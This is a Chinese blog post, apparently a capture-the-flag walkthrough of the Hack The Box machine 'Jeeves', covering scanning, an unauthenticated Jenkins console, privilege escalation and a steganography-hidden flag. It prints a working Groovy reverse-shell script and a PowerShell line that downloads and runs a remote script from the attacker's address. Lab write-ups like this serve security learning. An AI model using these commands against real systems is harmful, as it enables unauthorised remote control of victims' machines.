r0ckyzzz's Blog.

HTB靶机Jeeves通关笔记

Word count: 363Reading time: 1 min
2020/04/04 Share

HTB靶机Jeeves通关笔记

IP地址:10.10.10.63
系统:windows

开始

nmap 扫描

upload successful

不能打永恒之蓝
80端口不会POST数据 会直接跳转到error.html页面
然后那个页面是一张图片

upload successful

目录扫描真的太慢了 我们地理位置不是很有优势
我直接看了wp
用dirbuster/directory-list-2.3-medium.txt这个字典扫描50000端口会扫出一个
/askjeeves这个目录

我用dirb的big.txt字典什么都没扫出来- -!

打开是个jenkins页面

upload successful

这里关闭了权限认证所以可以直接访问后台

upload successful
这里可以直接执行命令
println('whoami'.execute().getText())

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
找到一个groovy反弹shell 的脚本

1
2
3
4
String host="10.10.16.45";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

得到一个反弹shell

upload successful

powershell 反弹shell的方法
https://www.anquanke.com/post/id/99793#h2-5

反弹一个meterpreter的shell 比较好操作

IEX(New-Object Net.WebClient).downloadString('http://10.10.16.45:8000/1.ps1')

upload successful

提权成功

upload successful

upload successful

找到了hm.txt 但不是flag

upload successful

最后看了wirteup 结果是隐写

upload successful

CATALOG
  1. 1. HTB靶机Jeeves通关笔记
    1. 1.1. ¶开始